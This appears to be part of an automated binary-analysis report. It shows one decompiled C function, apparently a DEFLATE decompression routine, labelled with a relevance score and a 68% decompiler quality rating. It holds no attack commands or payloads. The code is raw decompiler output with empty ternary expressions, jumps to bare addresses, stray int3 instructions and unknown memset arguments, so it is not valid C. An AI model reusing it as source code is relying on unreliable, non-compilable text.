
Uniqueness

Uniqueness Score: 0.03%

Function 001153DF, Relevance: .5, Instructions: 487
COMMONCrypto

C-Code - Quality: 68%

			E001153DF(signed int __ebx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t595;
				signed int _t596;
				signed int _t598;
				void* _t599;
				signed int _t609;
				signed int* _t619;
				signed int _t622;
				signed int _t639;
				signed int _t641;
				signed int _t646;
				signed char _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				unsigned int _t693;
				signed int _t694;
				signed int _t696;
				signed int _t697;
				signed int _t701;
				signed int _t711;
				signed int _t716;
				signed int _t718;
				signed int _t721;
				signed int _t723;
				signed int _t724;
				intOrPtr _t736;
				intOrPtr _t737;
				intOrPtr _t738;
				signed int _t741;
				signed int _t745;
				void* _t751;
				signed int _t756;
				signed int _t758;
				signed int _t762;
				signed int _t766;
				signed int _t769;
				signed int _t773;
				signed int _t778;
				signed int _t782;
				signed int _t783;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t795;
				signed int _t796;
				signed int _t798;
				signed int _t799;
				signed int _t806;
				signed int _t809;
				intOrPtr* _t811;
				void* _t812;
				signed int _t823;
				signed int _t825;
				intOrPtr _t827;
				signed int _t831;
				intOrPtr* _t833;
				signed int _t834;
				signed int _t842;
				signed int _t845;
				signed int _t848;
				signed int _t850;
				signed int _t851;
				signed int _t860;
				signed int _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				void* _t868;
				void* _t869;
				void* _t870;
				void* _t871;
				signed char _t872;
				signed char _t875;
				intOrPtr _t877;
				signed int _t880;
				signed int _t881;
				signed char _t883;
				signed int _t884;
				signed int _t885;
				signed char _t890;
				signed int _t892;
				void* _t893;
				signed int _t894;
				signed int _t897;
				signed int _t898;
				signed char _t899;
				intOrPtr _t901;
				intOrPtr _t903;
				void* _t906;
				signed char _t907;
				signed char _t908;
				signed int _t909;
				signed int _t913;
				signed char _t918;
				signed int _t919;
				signed int _t920;
				signed int _t923;
				signed int _t928;
				signed int _t932;
				signed char _t936;
				signed int _t937;
				signed char _t940;
				signed int _t941;
				signed int _t949;
				signed int _t964;
				signed int _t968;
				signed int _t970;
				signed int _t974;
				signed int* _t975;
				signed char* _t980;
				signed int _t981;
				signed int _t986;
				unsigned int _t987;
				signed int _t988;
				signed int _t989;
				signed int _t992;
				signed int _t993;
				signed int _t995;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				signed int _t1002;
				signed int _t1006;
				signed int _t1012;
				signed int _t1013;
				int _t1014;
				int _t1016;
				signed int _t1017;
				unsigned int _t1020;
				void* _t1024;
				intOrPtr _t1025;
				signed int _t1026;
				signed int _t1029;
				signed int _t1031;
				signed int _t1032;
				signed int _t1034;
				int _t1039;
				signed int _t1040;
				signed int _t1042;
				unsigned int _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				signed int _t1049;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed int _t1064;
				signed char _t1065;
				void* _t1066;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t1050 = __esi;
					_t1029 = __edi;
					_t846 = __ebx;
					if(__ebx >=  *(_t1066 - 0x20)) {
						break;
					}
					L1:
					_t872 = __esi;
					_t846 = __ebx + 1;
					_t987 = __edx | ( *__ebx & 0x000000ff) << __esi;
					 *(_t1066 - 0x18) = _t846;
					_t1064 = __esi + 8;
					 *(_t1066 - 4) = _t987;
					if(_t1064 < 0xf) {
						L227:
						_t646 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
						 *(_t1066 - 0x24) = _t646;
						__eflags = _t646;
						if(_t646 < 0) {
							L231:
							__eflags = _t1064 - 0xa;
							if(_t1064 <= 0xa) {
								continue;
							} else {
								L232:
								L233:
								 *(_t1066 - 0x1c) = _t872;
								while(1) {
									L234:
									_t872 =  *((short*)(_t1029 + 0x1700 + ((_t987 >> _t872 & 0x00000001) +  !( *(_t1066 - 0x24))) * 2));
									_t652 =  *(_t1066 - 0x1c) + 1;
									 *(_t1066 - 0x24) = _t872;
									 *(_t1066 - 0x1c) = _t652;
									__eflags = _t872;
									if(_t872 >= 0) {
										goto L2;
									}
									L235:
									__eflags = _t1064 - _t652 + 1;
									if(_t1064 < _t652 + 1) {
										goto L0;
									} else {
										L236:
										_t872 =  *(_t1066 - 0x1c);
										continue;
									}
									goto L295;
								}
								goto L2;
							}
						} else {
							L228:
							_t845 = _t646 >> 9;
							__eflags = _t845;
							if(_t845 == 0) {
								continue;
							} else {
								L229:
								__eflags = _t1064 - _t845;
								if(_t1064 >= _t845) {
									goto L2;
								} else {
									L230:
									continue;
								}
							}
						}
					} else {
						while(1) {
							L2:
							_t655 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
							 *(_t1066 - 0x1c) = _t655;
							if(_t655 < 0) {
								goto L4;
							}
							L3:
							_t872 = _t655 >> 9;
							_t660 = _t655 & 0x000001ff;
							L8:
							_t988 = _t987 >> _t872;
							_t1050 = _t1064 - _t872;
							_t875 =  *(0x121090 + _t660 * 4);
							_t595 =  *(0x121110 + _t660 * 4);
							 *(_t1066 - 4) = _t988;
							 *(_t1066 - 0x38) = _t875;
							 *(_t1066 - 0x28) = _t595;
							if(_t875 == 0) {
								L14:
								_t877 =  *(_t1066 - 0x10) -  *((intOrPtr*)(_t1066 + 0xc));
								 *((intOrPtr*)(_t1066 - 0x48)) = _t877;
								if(_t595 <= _t877 || ( *(_t1066 + 0x18) & 0x00000004) == 0) {
									L16:
									_t1029 =  *(_t1066 - 0x14);
									_t880 = (_t877 - _t595 &  *(_t1066 - 0x34)) +  *((intOrPtr*)(_t1066 + 0xc));
									 *(_t1066 - 0xc) = _t880;
									_t662 =  >  ?  *(_t1066 - 0x10) : _t880;
									_t881 =  *(_t1066 - 8);
									_t663 = ( >  ?  *(_t1066 - 0x10) : _t880) + _t881;
									_t1081 = ( >  ?  *(_t1066 - 0x10) : _t880) + _t881 -  *((intOrPtr*)(_t1066 - 0x40));
									if(( >  ?  *(_t1066 - 0x10) : _t880) + _t881 <=  *((intOrPtr*)(_t1066 - 0x40))) {
										L20:
										__eflags = _t881 - 9;
										if(_t881 < 9) {
											L29:
											goto 0x3012f7;
											asm("int3");
											do {
												L31:
												_t881 = _t881 - 3;
												 *_t1029 =  *_t988 & 0x000000ff;
												 *((char*)(_t1029 + 1)) =  *(_t988 + 1) & 0x000000ff;
												_t666 =  *(_t988 + 2) & 0x000000ff;
												_t988 = _t988 + 3;
												 *(_t1029 + 2) = _t666;
												_t1029 = _t1029 + 3;
												__eflags = _t881 - 2;
											} while (_t881 > 2);
											 *(_t1066 - 0x10) = _t1029;
											_t1029 =  *(_t1066 - 0x14);
											 *(_t1066 - 0xc) = _t988;
											_t988 =  *(_t1066 - 4);
											 *(_t1066 - 8) = _t881;
											__eflags = _t881;
											if(_t881 > 0) {
												L33:
												goto 0x30130b;
												asm("int3");
												_t827 =  *_t666;
												 *_t1029 = _t827;
												_t1029 =  *(_t1066 - 0x14);
												__eflags = _t881 - 1;
												if(_t881 > 1) {
													goto L35;
												}
												goto L37;
											}
										} else {
											L21:
											__eflags = _t881 -  *(_t1066 - 0x28);
											if(_t881 >  *(_t1066 - 0x28)) {
												goto L29;
											} else {
												L22:
												_t1049 =  *(_t1066 - 0xc);
												_t964 =  *(_t1066 - 0x10);
												_t831 = (_t881 & 0xfffffff8) + _t1049;
												 *(_t1066 - 0x24) = _t831;
												_t1026 = _t831;
												do {
													L23:
													 *_t964 =  *_t1049;
													_t833 =  *((intOrPtr*)(_t1049 + 4));
													_t1049 = _t1049 + 8;
													 *((intOrPtr*)(_t964 + 4)) = _t833;
													_t964 = _t964 + 8;
													__eflags = _t1049 - _t1026;
												} while (_t1049 < _t1026);
												_t988 =  *(_t1066 - 4);
												 *(_t1066 - 0x10) = _t964;
												_t881 =  *(_t1066 - 8) & 0x00000007;
												 *(_t1066 - 0xc) = _t1049;
												_t1029 =  *(_t1066 - 0x14);
												 *(_t1066 - 8) = _t881;
												__eflags = _t881 - 3;
												if(_t881 >= 3) {
													goto L29;
												} else {
													L25:
													__eflags = _t881;
													if(_t881 != 0) {
														L26:
														goto 0x3012e3;
														asm("int3");
														_t827 =  *_t833;
														 *_t1029 = _t827;
														_t1029 =  *(_t1066 - 0x14);
														__eflags = _t881 - 1;
														if(_t881 > 1) {
															L28:
															L35:
															goto 0x30131f;
															asm("int3");
															 *(_t988 + 1) =  *((intOrPtr*)(_t827 + 1));
															_t988 =  *(_t1066 - 4);
														}
														L37:
														_t83 = _t1066 - 0x10;
														 *_t83 =  *(_t1066 - 0x10) + _t881;
														__eflags =  *_t83;
													}
												}
											}
										}
										goto L38;
									} else {
										while(1) {
											L17:
											_t834 = _t881;
											_t881 = _t881 - 1;
											 *(_t1066 - 8) = _t881;
											if(_t834 == 0) {
												goto L38;
											}
											L18:
											if( *(_t1066 - 0x10) >=  *((intOrPtr*)(_t1066 - 0x40))) {
												L238:
												 *(_t1066 - 0xc) = 2;
												 *_t1029 = 0x35;
												goto L292;
											} else {
												L19:
												 *(_t1066 - 0x10) =  *(_t1066 - 0x10) + 1;
												 *((intOrPtr*)(_t1066 - 0x48)) =  *((intOrPtr*)(_t1066 - 0x48)) + 1;
												 *( *(_t1066 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1066 - 0x48)) -  *(_t1066 - 0x28) &  *(_t1066 - 0x34)) +  *((intOrPtr*)(_t1066 + 0xc))));
												_t988 =  *(_t1066 - 4);
												continue;
											}
											goto L295;
										}
										while(1) {
											L38:
											_t883 =  *(_t1066 - 0x20) - _t846;
											__eflags = _t883 - 4;
											if(_t883 < 4) {
												goto L57;
											}
											L39:
											_t1029 =  *(_t1066 - 0x14);
											__eflags =  *((intOrPtr*)(_t1066 - 0x40)) -  *(_t1066 - 0x10) - 2;
											if( *((intOrPtr*)(_t1066 - 0x40)) -  *(_t1066 - 0x10) < 2) {
												goto L57;
											} else {
												L40:
												__eflags = _t1050 - 0xf;
												if(_t1050 < 0xf) {
													_t1002 =  *(_t846 + 1) & 0x000000ff;
													_t883 = _t1050;
													_t724 =  *_t846 & 0x000000ff;
													_t846 = _t846 + 2;
													 *(_t1066 - 0x18) = _t846;
													 *(_t1066 - 4) =  *(_t1066 - 4) | (_t1002 << 0x00000008 | _t724) << _t883;
													_t1050 = _t1050 + 0x10;
													__eflags = _t1050;
													_t988 =  *(_t1066 - 4);
												}
												_t595 =  *((short*)(_t1029 + 0x160 + (_t988 & 0x000003ff) * 2));
												 *(_t1066 - 8) = _t595;
												__eflags = _t595;
												if(_t595 < 0) {
													L44:
													goto 0x301333;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L45:
														_t711 = _t988 >> _t883;
														_t883 = _t883 + 1;
														_t595 = (_t711 & 0x00000001) +  !_t846;
														_t846 =  *((short*)(_t1029 + 0x960 + _t595 * 2));
														__eflags = _t846;
													} while (_t846 < 0);
													 *(_t1066 - 8) = _t846;
													_t846 =  *(_t1066 - 0x18);
												} else {
													L43:
													_t883 = _t595 >> 9;
												}
												L47:
												_t987 = _t988 >> _t883;
												_t1064 = _t1050 - _t883;
												_t884 =  *(_t1066 - 8);
												 *(_t1066 - 4) = _t987;
												__eflags = _t884 & 0x00000100;
												if((_t884 & 0x00000100) != 0) {
													L83:
													_t885 = _t884 & 0x000001ff;
													 *(_t1066 - 8) = _t885;
													__eflags = _t885 - 0x100;
													if(_t885 != 0x100) {
														L219:
														_t673 = _t885 * 4 - 0x404;
														_t872 =  *(_t673 + 0x121010);
														_t595 =  *(_t673 + 0x121a48);
														 *(_t1066 - 0x38) = _t872;
														 *(_t1066 - 8) = _t595;
														__eflags = _t872;
														if(_t872 == 0) {
															L225:
															__eflags = _t1064 - 0xf;
															if(_t1064 >= 0xf) {
																L2:
																_t655 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
																 *(_t1066 - 0x1c) = _t655;
																if(_t655 < 0) {
																	goto L4;
																}
																goto L8;
															} else {
																L226:
																__eflags =  *(_t1066 - 0x20) - _t846 - 2;
																if( *(_t1066 - 0x20) - _t846 >= 2) {
																	L237:
																	_t989 =  *(_t846 + 1) & 0x000000ff;
																	_t676 =  *_t846 & 0x000000ff;
																	_t846 = _t846 + 2;
																	_t1029 =  *(_t1066 - 0x14);
																	_t872 = _t1064;
																	 *(_t1066 - 0x18) = _t846;
																	 *(_t1066 - 4) =  *(_t1066 - 4) | _t989 << _t1064 + 0x00000008 | _t676 << _t872;
																	_t1064 = _t1064 + 0x10;
																	_t987 =  *(_t1066 - 4);
																	do {
																		goto L2;
																	} while (_t1064 >= 0xf);
																	goto L226;
																} else {
																	goto L227;
																}
															}
														} else {
															L220:
															__eflags = _t1064 - _t872;
															if(_t1064 >= _t872) {
																L223:
																L224:
																_t1064 = _t1064 - _t872;
																_t680 = (_t595 << _t872) - 0x00000001 & _t987;
																_t987 = _t987 >> _t872;
																_t456 = _t1066 - 8;
																 *_t456 =  *(_t1066 - 8) + _t680;
																__eflags =  *_t456;
																 *(_t1066 - 4) = _t987;
																goto L225;
															} else {
																while(1) {
																	L221:
																	__eflags = _t846 -  *(_t1066 - 0x20);
																	if(_t846 >=  *(_t1066 - 0x20)) {
																		break;
																	}
																	L222:
																	_t595 = ( *_t846 & 0x000000ff) << _t1064;
																	_t846 = _t846 + 1;
																	_t872 =  *(_t1066 - 0x38);
																	_t987 = _t987 | _t595;
																	_t1050 = _t1064 + 8;
																	 *(_t1066 - 0x18) = _t846;
																	 *(_t1066 - 4) = _t987;
																	__eflags = _t1050 - _t872;
																	if(_t1050 < _t872) {
																		continue;
																	} else {
																		goto L223;
																	}
																	goto L295;
																}
																L262:
																 *_t1029 = 0x19;
																goto L285;
															}
														}
													} else {
														while(1) {
															L84:
															__eflags =  *(_t1029 + 0x14) & 0x00000001;
															if(( *(_t1029 + 0x14) & 0x00000001) != 0) {
																break;
															}
															L85:
															__eflags = _t1064 - 3;
															if(_t1064 >= 3) {
																L88:
																_t1050 = _t1064 - 3;
																_t693 = _t987 & 0x00000007;
																_t997 = _t987 >> 3;
																 *(_t1029 + 0x14) = _t693;
																_t694 = _t693 >> 1;
																__eflags = _t694;
																 *(_t1066 - 4) = _t997;
																 *(_t1066 - 0x1c) = _t1050;
																 *(_t1029 + 0x18) = _t694;
																if(_t694 != 0) {
																	L123:
																	__eflags = _t694 - 3;
																	if(_t694 == 3) {
																		L266:
																		 *(_t1066 - 0xc) = 0xffffffff;
																		 *_t1029 = 0xa;
																		goto L292;
																	} else {
																		L124:
																		__eflags = _t694 - 1;
																		if(_t694 != 1) {
																			L127:
																			_t897 = 0;
																			__eflags = 0;
																			while(1) {
																				L128:
																				 *(_t1066 - 8) = _t897;
																				__eflags = _t897 - 3;
																				if(_t897 >= 3) {
																					break;
																				}
																				L129:
																				_t595 =  *((char*)(_t897 + 0x121004));
																				 *(_t1066 - 0x1c) = _t595;
																				__eflags = _t1050 - _t595;
																				if(_t1050 >= _t595) {
																					L132:
																					_t1024 = _t1029 + _t897 * 4;
																					_t1043 =  *(_t1066 - 4);
																					 *(_t1024 + 0x2c) = (0x00000001 <<  *(_t1066 - 0x1c)) - 0x00000001 & _t1043;
																					_t806 =  *(_t1066 - 8);
																					_t936 =  *((char*)(_t806 + 0x121004));
																					_t1044 = _t1043 >> _t936;
																					_t1050 = _t1050 - _t936;
																					_t937 = _t806;
																					 *(_t1066 - 4) = _t1044;
																					 *(_t1066 - 0x1c) = _t1050;
																					 *(_t1024 + 0x2c) =  *(_t1024 + 0x2c) +  *((intOrPtr*)(0x121a38 + _t937 * 4));
																					_t997 = _t1044;
																					_t1029 =  *(_t1066 - 0x14);
																					_t897 = _t937 + 1;
																					continue;
																				} else {
																					while(1) {
																						L130:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L131:
																						_t809 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t897 =  *(_t1066 - 8);
																						_t997 = _t997 | _t809;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 0x18) = _t846;
																						 *(_t1066 - 4) = _t997;
																						_t595 =  *((char*)(_t897 + 0x121004));
																						 *(_t1066 - 0x1c) = _t595;
																						__eflags = _t1050 - _t595;
																						if(_t1050 < _t595) {
																							continue;
																						} else {
																							goto L132;
																						}
																						goto L295;
																					}
																					L248:
																					 *_t1029 = 0xb;
																					goto L285;
																				}
																				goto L295;
																			}
																			L133:
																			L134:
																			_t595 = memset(_t1029 + 0x1b80, 0, ??);
																			_t998 =  *(_t1066 - 4);
																			_t1068 = _t1068 + 0xc;
																			_t898 = 0;
																			__eflags = 0;
																			while(1) {
																				L135:
																				 *(_t1066 - 8) = _t898;
																				__eflags = _t898 -  *((intOrPtr*)(_t1029 + 0x34));
																				if(_t898 >=  *((intOrPtr*)(_t1029 + 0x34))) {
																					break;
																				}
																				L136:
																				__eflags = _t1050 - 3;
																				if(_t1050 >= 3) {
																					L139:
																					_t932 = _t998 & 0x00000007;
																					_t998 = _t998 >> 3;
																					_t1050 = _t1050 - 3;
																					 *(_t1066 - 4) = _t998;
																					 *(_t1066 - 0x1c) = _t1050;
																					_t595 =  *( *(_t1066 - 8) + 0x121a24) & 0x000000ff;
																					 *(_t1029 + 0x1b80 + _t595) = _t932;
																					_t898 =  *(_t1066 - 8) + 1;
																					continue;
																				} else {
																					while(1) {
																						L137:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L138:
																						_t595 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t998 = _t998 | _t595;
																						 *(_t1066 - 0x18) = _t846;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 4) = _t998;
																						__eflags = _t1050 - 3;
																						if(_t1050 < 3) {
																							continue;
																						} else {
																							goto L139;
																						}
																						goto L295;
																					}
																					L249:
																					 *_t1029 = 0xe;
																					goto L285;
																				}
																				goto L295;
																			}
																			L140:
																			 *((intOrPtr*)(_t1029 + 0x34)) = 0x13;
																			goto L141;
																		} else {
																			L125:
																			goto 0x3013af;
																			asm("int3");
																			asm("int3");
																			 *((intOrPtr*)(_t694 + 0x2c)) = 0x120;
																			L126:
																			_t811 = _t694 + 1 - 0x20;
																			 *_t811 =  *_t811 + _t811;
																			_t846 = _t846 + _t811;
																			_t812 = _t811 + 1;
																			 *_t812 =  *_t812 ^ _t812;
																			 *_t812 = _t812 +  *_t812;
																			 *0xde0 =  *0xde0 + _t812;
																			memset(_t812, ??, ??);
																			asm("movdqa xmm0, [0x121ae0]");
																			_t1068 = _t1068 + 0xc;
																			asm("movdqu [edi+0x40], xmm0");
																			asm("movdqu [edi+0x50], xmm0");
																			asm("movdqu [edi+0x60], xmm0");
																			asm("movdqu [edi+0x70], xmm0");
																			asm("movdqu [edi+0x80], xmm0");
																			asm("movdqu [edi+0x90], xmm0");
																			asm("movdqu [edi+0xa0], xmm0");
																			asm("movdqu [edi+0xb0], xmm0");
																			asm("movdqu [edi+0xc0], xmm0");
																			_t1045 = _t1029 + 0xd0;
																			asm("movdqa xmm0, [0x121af0]");
																			asm("movdqu [edi], xmm0");
																			asm("movdqu [edi+0x10], xmm0");
																			asm("movdqu [edi+0x20], xmm0");
																			asm("movdqu [edi+0x30], xmm0");
																			asm("movdqu [edi+0x40], xmm0");
																			asm("movdqu [edi+0x50], xmm0");
																			asm("movdqu [edi+0x60], xmm0");
																			asm("movdqa xmm0, [0x121ad0]");
																			asm("movdqu [edi+0x70], xmm0");
																			asm("movq [edi+0x80], xmm0");
																			 *((intOrPtr*)(_t1045 + 0x88)) = 0x8080808;
																			 *((intOrPtr*)(_t1045 + 0x8c)) = 0x8080808;
																			_t1029 =  *(_t1066 - 0x14);
																			while(1) {
																				L141:
																				_t696 =  *(_t1029 + 0x18);
																				__eflags = _t696;
																				if(_t696 < 0) {
																					break;
																				}
																				L142:
																				 *(_t1066 - 0xc) = 0x40 + _t696 * 0xda0 + _t1029;
																				memset(_t1066 - 0xd0, 0, 0x40);
																				memset( *(_t1066 - 0xc) + 0x120, 0, 0x800);
																				memset( *(_t1066 - 0xc) + 0x920, 0, 0x480);
																				_t899 = 0;
																				_t1068 = _t1068 + 0x24;
																				_t1012 = _t1029 + ( *(_t1029 + 0x18) + 0xb) * 4;
																				 *(_t1066 - 0x44) = _t1012;
																				__eflags =  *_t1012;
																				if( *_t1012 > 0) {
																					L143:
																					_t1029 =  *(_t1066 - 0xc);
																					do {
																						L144:
																						_t799 =  *(_t899 + _t1029) & 0x000000ff;
																						_t899 = _t899 + 1;
																						 *((intOrPtr*)(_t1066 + _t799 * 4 - 0xd0)) =  *((intOrPtr*)(_t1066 + _t799 * 4 - 0xd0)) + 1;
																						__eflags = _t899 -  *_t1012;
																					} while (_t899 <  *_t1012);
																				}
																				L145:
																				goto 0x3013d7;
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				L146:
																				 *(_t1066 - 0x8c) = _t899;
																				 *(_t1066 - 0x90) = _t899;
																				 *(_t1066 - 0x2c) = _t899;
																				 *(_t1066 - 0x30) = _t899;
																				do {
																					L147:
																					_t736 =  *((intOrPtr*)(_t1066 + _t1012 - 0xd4));
																					_t901 = _t899 + _t736 + _t899 + _t736;
																					_t1029 = _t1029 + _t736;
																					_t737 =  *((intOrPtr*)(_t1066 + _t1012 - 0xd0));
																					 *(_t1066 - 0x30) =  *(_t1066 - 0x30) + _t737;
																					 *((intOrPtr*)(_t1066 + _t1012 - 0x90)) = _t901;
																					_t738 =  *((intOrPtr*)(_t1066 + _t1012 - 0xcc));
																					_t903 = _t901 + _t737 + _t901 + _t737;
																					 *(_t1066 - 0x2c) =  *(_t1066 - 0x2c) + _t738;
																					 *((intOrPtr*)(_t1066 + _t1012 - 0x8c)) = _t903;
																					_t899 = _t903 + _t738 + _t903 + _t738;
																					 *(_t1066 + _t1012 - 0x88) = _t899;
																					_t1012 = _t1012 + 0xc;
																					__eflags = _t1012 - 0x40;
																				} while (_t1012 <= 0x40);
																				 *(_t1066 - 0x4c) = _t899;
																				 *(_t1066 - 0x24) = _t1029;
																				_t1029 =  *(_t1066 - 0x14);
																				_t906 =  *(_t1066 - 0x24) +  *(_t1066 - 0x2c) +  *(_t1066 - 0x30);
																				__eflags =  *(_t1066 - 0x4c) - 0x10000;
																				if( *(_t1066 - 0x4c) == 0x10000) {
																					L150:
																					_t741 =  *(_t1066 - 0x44);
																					 *(_t1066 - 0x30) = 0xffffffff;
																					 *(_t1066 - 0x4c) = 0;
																					__eflags =  *_t741;
																					if( *_t741 > 0) {
																						L151:
																						_t1065 =  *(_t1066 - 0x4c);
																						do {
																							L152:
																							L153:
																							_t918 =  *(_t1065 + _t741) & 0x000000ff;
																							 *(_t1066 - 0x44) = _t918;
																							__eflags = _t918;
																							if(_t918 != 0) {
																								L154:
																								_t778 =  *(_t1066 + _t918 * 4 - 0x90);
																								 *(_t1066 - 0x2c) = _t778;
																								 *(_t1066 + _t918 * 4 - 0x90) = _t778 + 1;
																								 *(_t1066 - 0x24) = _t918;
																								__eflags = _t918;
																								if(_t918 != 0) {
																									L155:
																									do {
																										L156:
																										 *(_t1066 - 0x2c) =  *(_t1066 - 0x2c) >> 1;
																										_t798 =  *(_t1066 - 0x24) - 1;
																										_t1012 = _t1012 + _t1012 |  *(_t1066 - 0x2c) & 0x00000001;
																										 *(_t1066 - 0x24) = _t798;
																										__eflags = _t798;
																									} while (_t798 != 0);
																									_t918 =  *(_t1066 - 0x44);
																								}
																								L158:
																								__eflags = _t918 - 0xa;
																								if(_t918 > 0xa) {
																									L164:
																									_t782 =  *(_t1066 - 0xc) + 0x120 + (_t1012 & 0x000003ff) * 2;
																									_t846 =  *(_t1066 - 0x30);
																									 *(_t1066 - 0x44) = _t782;
																									_t783 =  *_t782;
																									 *(_t1066 - 0x2c) = _t783;
																									__eflags = _t783;
																									if(_t783 == 0) {
																										 *( *(_t1066 - 0x44)) = _t846;
																										_t783 = _t846;
																										_t846 = _t846 - 2;
																										__eflags = _t846;
																										 *(_t1066 - 0x2c) = _t783;
																										 *(_t1066 - 0x30) = _t846;
																									}
																									L166:
																									_t1020 = _t1012 >> 9;
																									__eflags = _t918 - 0xb;
																									if(_t918 > 0xb) {
																										L167:
																										_t919 = _t918 + 0xfffffff5;
																										__eflags = _t919;
																										 *(_t1066 - 0x24) = _t919;
																										_t920 =  *(_t1066 - 0x2c);
																										do {
																											L168:
																											_t1020 = _t1020 >> 1;
																											_t788 = 0x48f - _t920 - (_t1020 & 0x00000001);
																											_t923 =  *( *(_t1066 - 0xc) + 0x91e) & 0x0000ffff;
																											__eflags = _t923;
																											if(_t923 != 0) {
																												_t920 = _t923;
																											} else {
																												 *( *(_t1066 - 0xc) + _t788 * 2) = _t846;
																												_t789 =  *(_t1066 - 0x30);
																												_t920 = _t789;
																												_t790 = _t789 - 2;
																												 *(_t1066 - 0x30) = _t790;
																												_t846 = _t790;
																											}
																											L171:
																											_t361 = _t1066 - 0x24;
																											 *_t361 =  *(_t1066 - 0x24) - 1;
																											__eflags =  *_t361;
																										} while ( *_t361 != 0);
																										 *(_t1066 - 0x2c) = _t920;
																										_t783 = _t920;
																									}
																									L173:
																									_t1012 = (_t1020 >> 0x00000001 & 0x00000001) - _t783;
																									__eflags = _t1012;
																									 *( *(_t1066 - 0xc) + 0x91e + _t1012 * 2) = _t1065;
																								} else {
																									L159:
																									_t795 = (_t918 << 0x00000009 | _t1065) & 0x0000ffff;
																									 *(_t1066 - 0x44) = _t795;
																									__eflags = _t1012 - 0x400;
																									if(_t1012 < 0x400) {
																										L160:
																										goto 0x301401;
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										L161:
																										_t796 = _t795 << _t918;
																										 *(_t1066 - 0x4c) = _t796 + _t796;
																										_t928 =  *(_t1066 - 0xc) + _t1012 * 2 + 0x120;
																										__eflags = _t928;
																										do {
																											L162:
																											 *_t928 = _t1029;
																											_t1012 = _t1012 + _t796;
																											_t928 = _t928 +  *(_t1066 - 0x4c);
																											__eflags = _t1012 - 0x400;
																										} while (_t1012 < 0x400);
																										_t1029 =  *(_t1066 - 0x14);
																									}
																								}
																							}
																							L174:
																							_t741 =  *(_t1029 + 0x18);
																							_t1065 = _t1065 + 1;
																							__eflags = _t1065 -  *((intOrPtr*)(_t1029 + 0x2c + _t741 * 4));
																						} while (_t1065 <  *((intOrPtr*)(_t1029 + 0x2c + _t741 * 4)));
																						goto 0x301417;
																						asm("int3");
																					}
																					L176:
																					__eflags =  *(_t1029 + 0x18) - 2;
																					if( *(_t1029 + 0x18) != 2) {
																						L217:
																						 *(_t1029 + 0x18) =  *(_t1029 + 0x18) - 1;
																						continue;
																					} else {
																						L177:
																						_t907 = 0;
																						__eflags = 0;
																						while(1) {
																							L178:
																							_t1013 =  *(_t1066 - 4);
																							while(1) {
																								L179:
																								 *(_t1066 - 8) = _t907;
																								__eflags = _t907 -  *(_t1029 + 0x30) +  *(_t1029 + 0x2c);
																								if(_t907 >=  *(_t1029 + 0x30) +  *(_t1029 + 0x2c)) {
																									break;
																								}
																								L180:
																								__eflags = _t1065 - 0xf;
																								if(_t1065 >= 0xf) {
																									L197:
																									_t756 =  *((short*)(_t1029 + 0x1ca0 + (_t1013 & 0x000003ff) * 2));
																									 *(_t1066 - 0x28) = _t756;
																									__eflags = _t756;
																									if(_t756 < 0) {
																										L199:
																										L200:
																										do {
																											L201:
																											 *(_t1066 - 0x28) =  !( *(_t1066 - 0x28));
																											_t758 = _t1013 >> _t907;
																											_t907 = _t907 + 1;
																											_t595 =  *((short*)(_t1029 + 0x24a0 + ((_t758 & 0x00000001) +  *(_t1066 - 0x28)) * 2));
																											 *(_t1066 - 0x28) = _t595;
																											__eflags = _t595;
																										} while (_t595 < 0);
																									} else {
																										L198:
																										_t907 = _t756 >> 9;
																										_t595 = _t756 & 0x000001ff;
																										 *(_t1066 - 0x28) = _t595;
																									}
																									L202:
																									_t1013 = _t1013 >> _t907;
																									_t1050 = _t1065 - _t907;
																									 *(_t1066 - 4) = _t1013;
																									 *(_t1066 - 0x1c) = _t1050;
																									__eflags = _t595 - 0x10;
																									if(__eflags >= 0) {
																										L204:
																										if(__eflags != 0) {
																											L207:
																											_t908 =  *((char*)(_t595 + 0x120ff0));
																											 *(_t1066 - 0x38) = _t908;
																											__eflags = _t1050 - _t908;
																											if(_t1050 >= _t908) {
																												L211:
																												_t1050 = _t1050 - _t908;
																												 *(_t1066 - 0x1c) = _t1050;
																												_t909 =  *(_t1066 - 0x14);
																												_t1039 = ((0x00000001 << _t908) - 0x00000001 & _t1013) +  *((char*)(_t595 + 0x120ff8));
																												__eflags =  *(_t1066 - 0x28) - 0x10;
																												_t762 =  *(_t1066 - 8);
																												 *(_t1066 - 4) = _t1013 >> _t908;
																												if( *(_t1066 - 0x28) != 0x10) {
																													_t1016 = 0;
																													__eflags = 0;
																												} else {
																													_t1016 =  *(_t762 + _t909 + 0x2923) & 0x000000ff;
																												}
																												L214:
																												memset(_t762 + _t909 + 0x2924, _t1016, _t1039);
																												_t1068 = _t1068 + 0xc;
																												_t907 =  *(_t1066 - 8) + _t1039;
																												_t1029 =  *(_t1066 - 0x14);
																												L178:
																												_t1013 =  *(_t1066 - 4);
																												continue;
																											} else {
																												while(1) {
																													L208:
																													__eflags = _t846 -  *(_t1066 - 0x20);
